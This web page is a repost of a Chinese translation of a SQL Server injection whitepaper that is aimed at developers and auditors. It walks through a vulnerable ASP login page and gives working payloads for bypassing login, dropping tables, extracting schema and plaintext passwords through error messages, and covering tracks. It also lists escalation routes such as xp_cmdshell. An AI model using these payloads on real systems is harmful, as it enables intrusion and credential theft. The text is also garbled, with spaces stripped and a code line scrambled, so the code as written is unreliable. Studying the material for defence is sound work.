网站导航网学 原创论文 原创专题 网站设计 最新系统 原创论文 论文降重 发表论文 论文发表 UI设计定制 论文答辩PPT格式排版 期刊发表 论文专题
返回网学首页
网学原创论文
最新论文 推荐专题 热门论文 论文专题
当前位置: 网学 > 交易代码 > SQL语法 > 正文

SQLServer应用程序中的高级SQL注入(1)

论文降重修改服务、格式排版等 获取论文 论文降重及排版 论文发表 相关服务

    SQLServer应用程序中的高级SQL注入摘要:这份文档是详细讨论SQL注入技术,它适应于比较流行的IIS+ASP+SQLSERVER平台。它讨论了哪些SQL语句能通过各种各样的方法注入到应用程序中,并且记录与攻击相关的数据确认和数据库锁定。这份文档的预期读者为与数据库通信的WEB程序的开发者和那些扮演审核WEB应用程序的安全专家。介绍:SQL是一种用于关系数据库的结构化查询语言。它分为许多种,但大多数都松散地基于美国国家标准化组织最新的标准SQL-92。典型的执行语句是query,它能够收集比较有达标性的记录并返回一个单一的结果集。SQL语言可以修改数据库结构(数据定义语言)和操作数据库内容(数据操作语言)。在这份文档中,我们将特别讨论SQLSERVER所使用的Transact-SQL语言。当一个攻击者能够通过往query中插入一系列的sql语句来操作数据写入到应用程序中去,我们管这种方法定义成SQL注入。一个典型的SQL语句如下:Selectid,forename,surnamefromauthors这条语句将返回authors表中所有行的id,forename和surname列。这个结果可以被限制,例如:Selectid,forename,surnamefromauthorswhereforename’john’andsurname=’smith’需要着重指明的是字符串’john’和’smith’被单引号限制。明确的说,forename和surname字段是被用户提供的输入限制的,攻击者可以通过输入值来往这个查询中注入一些SQL语句,如下:Forename:jo’hnSurname:smith查询语句变为:Selectid,forename,surnamefromauthorswhereforename=’jo’hn’andsurname=’smith’当数据库试图去执行这个查询时,它将返回如下错误:Server:Msg170,Level15,State1,Line1Line1:Incorrectsyntaxnear’hn’造成这种结果的原因是插入了.作为定界符的单引号。数据库尝试去执行’hn’,但是失败。如果攻击者提供特别的输入如:Forename:jo’;droptableauthors—Surname:结果是authors表被删除,造成这种结果的原因我们稍后再讲。看上去好象通过从输入中去掉单引号或者通过某些方法避免它们都可以解决这个问题。这是可行的,但是用这种方法做解决方法会存在几个困难。第一,并不是所有用户提供的数据都是字符串。如果用户输入的是通过用户id来查询author,那我们的查询应该像这样:Selectid,forename,surnamefromauthorswhereid=1234
    在这种情况下,一个攻击者可以非常简单地在数字的结尾添加SQL语句,在其他版本的SQL语言中,使用各种各样的限定符号;在数据库管理系统JET引擎中,数据可以被使用’#’限定。第二,避免单引号尽管看上去可以,但是是没必要的,原因我们稍后再讲。我们更进一步地使用一个简单的ASP登陆页面来指出哪些能进入SQLSERVER数据库并且尝试鉴别进入一些虚构的应用程序的权限。这是一个提交表单页的代码,让用户输入用户名和密码:

Login

Username:
Password:
下面是process_login.asp的代码,它是用来控制登陆的: <%@LANGUAGE=JScript%><%functiontrace(str){if(Request.form("debug")=="true")Response.write(str);}functionLogin(cn){varusername;
    varpassword;username=Request.form("username");password=Request.form("password");varrso=Server.CreateObject("ADODB.Recordset");varsql="select*fromuserswhereusername=’"+username+"’andpassword=’"+password+"’";trace("query:"+sql);rso.open(sql,cn);if(rso.EOF){rso.close();%>



ACCESSDENIED

<%Response.endreturn;}else{Session("username")=""+rso("username");%>

ACCESSGRANTED

Welcome,<%Response.write(rso("Username"));Response.write("");Response.end}}functionMain(){//Setupconnectionvarusernamevarcn=Server.createobject("ADODB.Connection");cn.connectiontimeout=20;cn.open("localserver","sa","password");username=newString(Request.form("username"));if(username.length>0){Login(cn);}cn.close();}Main();%>出现问题的地方是process_lgin.asp中产生查询语句的部分:Varsql="select*frompassword=’"+password+"’";如果用户输入的信息如下:Username:’;droptableusers—Password:userswhereusername=’"+username+"’and
    数据库中表users将被删除,拒绝任何用户进入应用程序。’—’符号在Transact-SQL中表示忽略’—’以后的语句,’;’符号表示一个查询的结束和另一个查询的开始。’—’位于username字段中是必须的,它为了使这个特殊的查询终止,并且不返回错误。攻击者可以只需提供他们知道的用户名,就可以以任何用户登陆,使用如下输入:Username:admin’—攻击者可以使用users表中第一个用户,输入如下:Username:’or1=1—更特别地,攻击者可以使用完全虚构的用户登陆,输入如下:Username:’unionselect1,’fictional_user’,’some_password’,1—这种结果的原因是应用程序相信攻击者指定的是从数据库中返回结果的一部分。通过错误消息获得信息这个几乎是DavidLitchfield首先发现的,并且通过作者渗透测试的;后来David写了一份文档,后来作者参考了这份文档。这些解释讨论了‘错误消息‘潜在的机制,使读者能够完全地了解它,潜在地引发他们的能力。为了操作数据库中的数据,攻击者必须确定某些数据库和某些表的结构。例如我们可以使用如下语句创建user表:Createtalbeusers(Idint,Usernamevarchar(255),Passwordvarchar(255),Privsint)然后将下面的用户插入到users表中:Insertintousersvalues(0,’admin’,’r00tr0x!’,0xffff)Insertintousersvalues(0,’guest’,’guest’,0x0000)Insertintousersvalues(0,’chris’,’password’,0x00ff)Insertintousersvalues(0,’fred’,’sesame’,0x00ff)如果我们的攻击者想插入一个自己的用户。在不知道users表结构的情况下,他不可能成功。即使他比较幸运,至于privs字段不清楚。攻击者可能插入一个’1’,这样只给他自己一个低权限的用户。幸运地,如果从应用程序(默认为ASP行为)返回错误消息,那么攻击者可以确定整个数据库的结构,并且可以以程序中连接SQLSERVER的权限度曲任何值。(下面以一个简单的数据库和asp脚本来举例说明他们是怎么工作的)首先,攻击者想获得建立用户的表的名字和字段的名字,要做这些,攻击者需要使用select语法的having子句:Username:’having1=1—这样将会出现如下错误:MicrosoftOLEDBProviderforODBCDriverserror’80040e14’[Microsoft][ODBCSQLServerDriver][SQLServer]Column’users.id’isinvalidintheselectlistbecauseitisnotcontainedinanaggregatefunctionandthereisnoGROUPBYclause./process_login.asp,line35
    因此现在攻击者知道了表的名字和第一个地段的名字。他们仍然可以通过把字段放到groupby子句只能感去找到一个一个字段名,如下:Username:’groupbyusers.idhaving1=1—出现的错误如下:MicrosoftOLEDBProviderforODBCDriverserror’80040e14’[Microsoft][ODBCSQLServerDriver][SQLServer]Column’users.username’isinvalidintheselectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBYclause./process_login.asp,line35最终攻击者得到了username字段后:‘groupbyusers.id,users.username,users.password,users.privshaving1=1—这句话并不产生错误,相当于:select*fromuserswhereusername=’’因此攻击者现在知道查询涉及users表,按顺序使用列’id,username,password,privs’。能够确定每个列的类型是非常有用的。这可以通过使用类型转化来实现,例如:Username:’unionselectsum(username)fromusers—这利用了SQLSERVER在确定两个结果集的字段是否相等前应用sum子句。尝试去计算sum会得到以下消息:MicrosoftOLEDBProviderforODBCDriverserror’80040e07’[Microsoft][ODBCSQLServerDriver][SQLServer]Thesumoraverageaggregateoperationcannottakeavarchardatatypeasanargument./process_login.asp,line35这告诉了我们’username’字段的类型是varchar。如果是另一种情况,我们尝试去计算sum()的是数字类型,我们得到的错误消息告诉我们两个集合的字段数量不相等。Username:’unionselectsum(id)fromusers—MicrosoftOLEDBProviderforODBCDriverserror’80040e14’[Microsoft][ODBCSQLServerDriver][SQLServer]AllqueriesinanSQLstatementcontainingaUNIONoperatormusthaveanequalnumberofexpressionsintheirtargetlists./process_login.asp,line35我们可以用这种技术近似地确定数据库中任何表中的任何字段的类型。这样攻击者就可以写一个好的insert查询,例如:Username:’;insertintousersvalues(666,’attacker’,’foobar’,’0xffff)—这种技术的潜在影响不仅仅是这些。攻击者可以利用这些错误消息显示环境信息或数据库。通过运行一列一定格式的字符串可以获得标准的错误消息:select*frommaster..sysmessages解释这些将实现有趣的消息。一个特别有用的消息关系到类型转化。如果你尝试将一个字符串转化成一个整型数字,那么字符串的所有内容会返回到错误消息中。例如在我们简单的登陆页面中,在username后面会显示出SQLSERVER的版本和所运行的操作系统信息:Username:’unionselect@@version,1,1,1—
    MicrosoftOLEDBProviderforODBCDriverserror’80040e07’[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue’MicrosoftSQLServer2000-8.00.194(IntelX86)Aug6200000:57:48Copyright(c)1988-2000MicrosoftCorporationEnterpriseEditiononWindowsNT5.0(Build2195:ServicePack2)’toacolumnofdatatypeint./process_login.asp,line35这句尝试去将内置的’@@version’常量转化成一个整型数字,因为users表中的第一列是整型数字。这种技术可以用来读取数据库中任何表的任何值。自从攻击者对用户名和用户密码比较感兴趣后,他们比较喜欢去从users表中读取用户名,例如:Username:’unionselectmin(username),1,1,1fromuserswhereusername>’a’—这句选择users表中username大于’a’中的最小值,并试图把它转化成一个整型数字:MicrosoftOLEDBProviderforODBCDriverserror’80040e07’[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthevarcharvalue’admin’toacolumnofdatatypeint./process_login.asp,line35因此攻击者已经知道用户admin是存在的。这样他就可以重复通过使用where子句和查询到的用户名去寻找下一个用户。Username:’unionselectmin(username),1,1,1fromuserswhereusername>’admin’—MicrosoftOLEDBProviderforODBCDriverserror’80040e07’[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthevarcharvalue’chris’toacolumnofdatatypeint./process_login.asp,line35一旦攻击者确定了用户名,他就可以开始收集密码:Username:’unionselectpassword,1,1,1fromuserswhereusername=’admin’—MicrosoftOLEDBProviderforODBCDriverserror’80040e07’[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthevarcharvalue’r00tr0x!’toacolumnofdatatypeint./process_login.asp,line35一个更高级的技术是将所有用户名和密码连接长一个单独的字符串,然后尝试把它转化成整型数字。这个例子指出:Transavt-SQL语法能够在不改变相同的行的意思的情况下把它们连接起来。下面的脚本将把值连接起来:begindeclare@retvarchar(8000)set@ret=’:’select@ret=@ret+’’+username+’/’+passwordfromuserswhereusername>@retselect@retasretintofooend
    攻击者使用这个当作用户名登陆(都在一行)Username:’;begindeclare@retvarchar(8000)set@ret=’:’select@ret=@ret+’’+username+’/’+passwordfromuserswhereusername>@retselect@retasretintofooend—这就创建了一个foo表,里面只有一个单独的列’ret’,里面存放着我们得到的用户名和密码的字符串。正常情况下,一个低权限的用户能够在同一个数据库中创建表,或者创建临时数据库。然后攻击者就可以取得我们要得到的字符串:Username:’unionselectret,1,1,1fromfoo—MicrosoftOLEDBProviderforODBCDriverserror’80040e07’[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthevarcharvalue’:admin/r00tr0x!guest/guestchris/passwordfred/sesame’toacolumnofdatatypeint./process_login.asp,line35然后丢弃(删除)表来清楚脚印:Username:’;droptablefoo—这个例子仅仅是这种技术的一个表面的作用。没必要说,如果攻击者能够从数据库中获得足够的错误西,他们的工作就变的无限简单。获得更高的权限一旦攻击者控制了数据库,他们就想利用那个权限去获得网络上更高的控制权。这可以通过许多途径来达到:1.在数据库服务器上,以SQLSERVER权限利用xp_cmdshell扩展存储过程执行命令。2.利用xp_regread扩展存储过程去读注册表的键值,当然包括SAM键(前提是SQLSERVER是以系统权限运行的)3.利用其他存储过程去改变服务器4.在连接的服务器上执行查询5.创建客户扩展存储过程去在SQLSERVER进程中执行溢出代码6.使用’bulkinsert’语法去读服务器上的任意文件7.使用bcp在服务器上建立任意的文本格式的文件8.使用sp_OACreate,sp_OAMethod和sp_OAGetProperty系统存储过程去创建ActiveX应用程序,使它能做任何ASP脚本可以做的事情这些只列举了非常普通的可能攻击方法的少量,攻击者很可能使用其它方法。我们介绍收集到的攻击关于SQL服务器的明显攻击方法,为了说明哪方面可能并被授予权限去注入SQL.。我们将依次处理以上提到的各种方法.
    

  • 上一篇资讯: sqlserver彻底删除(1)
  • 下一篇资讯: SQLServer常用语句
  • 设为首页 | 加入收藏 | 网学首页 | 原创论文 | 计算机原创
    版权所有 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
    Copyright 2008-2020 myeducs.Cn www.myeducs.Cn All Rights Reserved 湘ICP备09003080号 常年法律顾问:王律师